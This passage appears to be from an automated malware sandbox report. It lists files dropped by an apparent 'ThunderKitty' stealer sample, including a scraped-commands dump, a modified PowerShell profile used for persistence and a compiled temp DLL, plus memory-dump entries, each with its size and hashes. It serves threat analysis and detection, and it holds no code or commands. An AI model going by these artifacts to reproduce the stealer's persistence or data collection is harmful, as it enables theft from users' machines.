d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
23aba7e7ecd37fd9f076dbd4d6e981e2

SHA1
40150b7db90f125b7b1c7cae65250f3a13a5bbb3

SHA256
a67ce8b05ec37c76167b8769946b840cee681b0c3a19b8d7c56835ad21221b12

SHA512
fce8455921832c8960e1aa783091b83fe17aa885b0a86e92d2ada35c76bfc79122d90b0260f6571018d7317ffee0c3bedc7f0bbf4d21a41e77d02e25892d3c9a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
826ca040e1f9e84acd20f789d81903f6

SHA1
4d997b017a5cbf868011df6623793770c86a377b

SHA256
eb551c927c34363036e8e2186ff9c7693d0271165358972cf5342f22499fe62a

SHA512
9a013fc1302ce4eeb2781b237c32070ed3008bdb85ab6310eed4064558a2547cf677faeb366a6da112c3d06d53ab83c1693c5c27b6aee8284503ce80c62ab660

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
579c6e465a86fb413710d47da4b10497

SHA1
a96f55236f30297eff9607d3e7bc9bd961c14c12

SHA256
03d3318153697f41a5756f7e9e3fe0769e3aa3ccf93c40bc2e795f7417f1cc20

SHA512
a29f19af9975be5423a32b06b5bea5908e072f5179389ede43354395490fabc486341b9e231615968bb20dc85c50cbf283705fedd6353a271572eb84258af69c

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES953B.tmp

Filesize
1KB

MD5
f239636b7e7f9f12f67a6a06286d9d41

SHA1
b1386944e63b5fe19ac7443c7d4ed1beafec0f8a

SHA256
e23e544537e84c80e908b0c35042a2ffacf5d9b0b287565b426df7a297170b94

SHA512
0c25785ff225e4fb1f482935338912acbd8ee8a09a807da6040940782327350dddb712673cec648499543b681685d6e037cba9ec8218a99c2fb908b960cd8e3b

Download Submit
C:\Users\Admin\AppData\Local\Temp\ThunderKitty.zip

Filesize
248KB

MD5
73fdfd8142a50d8f45d8d42d897ae3aa

SHA1
eaef82c9067d3d5ff2bfe3aff58e7165eaa6c35e

SHA256
b736a60a21e84db7ab2c6ffe905802b3eccf2ca082e95f606af838a6c4fa93bd

SHA512
f8cb10a8cfd3c741035fcfc11005a40565da7dfcb5448a79de2bd7bd4dfd6ce5fc21cc0abd8b43a363f57b87d06376723760bfb6fceeade11a0eb6de905eaee0

Download Submit
C:\Users\Admin\AppData\Local\Temp\ThunderKitty\SystemInfo\ThunderKitty-ScrapedCMDS.txt

Filesize
23KB

MD5
d9e710c5f3ffa3e8fb7a87ac07c565b7

SHA1
b5cdb10dd6e58e43c41f1aa337d6a96d6e3dca7d

SHA256
fc71c949bd6e90d09cf3459568c72a4cec61511105d75d085578b0fa560b34c3

SHA512
9cc3a3eb080e61a913eb84f9112b281fbd2765c59c0e76e05b6b099302bddc284f5dece72f8dcb26cd7d44b0db79164720e96f70bc6486c424bbf4c2200dfe7c

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_u5thzjgk.05o.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\mr1elz5x\mr1elz5x.dll

Filesize
4KB

MD5
afc070a1a1463f72087236499f41bcc5

SHA1
bf63e79eb1b6b52c5bfa12f090e5037479926901

SHA256
7695696a5e7c6069879a385ffa9a27e5d757b6022b2999f22d26003dbd7af728

SHA512
4c131493b2593c284a693a97e5344fc3680637d35f405f07902ac245f94a1d2b377ba5135a2c9e9f50364f29766f3d40bcdd174ba05ebdbae9fb279fa5c5b201

Download Submit
C:\Users\Admin\Documents\WindowsPowerShell\Microsoft.PowerShell_profile.ps1

Filesize
2KB

MD5
9758656bbe8589c66bb241b052490c72

SHA1
b73da83fb3ae6b86c6365769a04de9845d5c602c

SHA256
e4bfe191530cc53138c4a265755539f8a115f7828faba79dfac91f3184b26351

SHA512
da9a8ecba8c2071e467f2d72fac524843fb0011c8486dd95e8b948b1c7f91bf02bcb80c20a01eddb6971b96db5ebde5f7c4c607e6b6d15e75d971ea104436e34

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\mr1elz5x\CSCEE0AB313998A49A5A0C7AF4E321C8B13.TMP

Filesize
652B

MD5
69089bd322392d9b10d1f9c854a56fb7

SHA1
45eb1c427d0fb60b44ed3409d629ad4f563b7644

SHA256
54473e99dd04b0b0253843511b9d4df6ee87ca287fe7cfda639ed90b164cec2d

SHA512
dc3fa1a2681631d05850591350cc1f067b61d28dcbe426712fe0dc099fbe54820735d932f7f3a5e317327f93fcf3214844d22326175bbd9798606bbf3a756cf8

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\mr1elz5x\mr1elz5x.0.cs

Filesize
1KB

MD5
8a1e7edb2117ec5dde9a07016905923b

SHA1
0155dbeeb16333e2eaa767b0209750efee56f47f

SHA256
c379ac84c970f2055851b084c44575a5e4b5a70dc25f0acdd49aad306489b007

SHA512
4ff0601803a006c661c962fe158cd5e9f40031d6b4fd7c5a05969a52d812e1fcb0aab20916fcad6c61c6d44cc7cfdf1e4f344f22ced937a0cd757ad841d3ab21

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\mr1elz5x\mr1elz5x.cmdline

Filesize
369B

MD5
89d6f393dede3bca1370018aa5f16558

SHA1
6cf4ea9a6b108a8568c5a38dced41050d1019803

SHA256
0419f5a2ea2585ee8030cc7cc476b00ce5ed342a6102cd053a2e581146019e75

SHA512
8ee6d0eaee37c427cf0ee7f77a28073e5ec99e7c3a23c002cb766a96347f59f5a0f343f24ad946e2202e7d6b183fe886195b091a91a47ae436a6ddd2e92e03f4

Download Submit
memory/840-23-0x00007FF9E6270000-0x00007FF9E6D31000-memory.dmp

Filesize
10.8MB

Download
memory/840-50-0x00007FF9E6270000-0x00007FF9E6D31000-memory.dmp

Filesize
10.8MB

Download
memory/840-24-0x00007FF9E6270000-0x00007FF9E6D31000-memory.dmp

Filesize
10.8MB

Download
memory/840-0-0x00007FF9E6273000-0x00007FF9E6275000-memory.dmp

Filesize
8KB

Download
memory/2976-79-0x0000024B567A0000-0x0000024B567C4000-memory.dmp

Filesize
144KB

Download
memory/2976-78-0x0000024B567A0000-0x0000024B567CA000-memory.dmp

Filesize
168KB

Download
memory/2976-62-0x0000024B3DB60000-0x0000024B3DB68000-memory.dmp

Filesize
32KB

Download
memory/2976-114-0x0000024B56790000-0x0000024B567A2000-memory.dmp

Filesize
72KB

Download
memory/2976-115-0x0000024B56770000-0x0000024B5677A000-memory.dmp

Filesize
40KB

Download
memory/4104-67-0x000002B91DED0000-0x000002B91E676000-memory.dmp

Filesize
7.6MB

Download
memory/4104-74-0x00007FF9E6270000-0x00007FF9E6D31000-memory.dmp

Filesize
10.8MB

Download
memory/4104-21-0x00007FF9E6270000-0x00007FF9E6D31000-memory.dmp

Filesize
10.8MB

Download
memory/4104-34-0x00007FF9E6270000-0x00007FF9E6D31000-memory.dmp

Filesize
10.8MB

Download
memory/4104-7-0x000002B904E60000-0x000002B904E82000-memory.dmp

Filesize
136KB

Download
memory/4104-1-0x00007FF9E6270000-0x00007FF9E6D31000-memory.dmp

Filesize
10.8MB

Download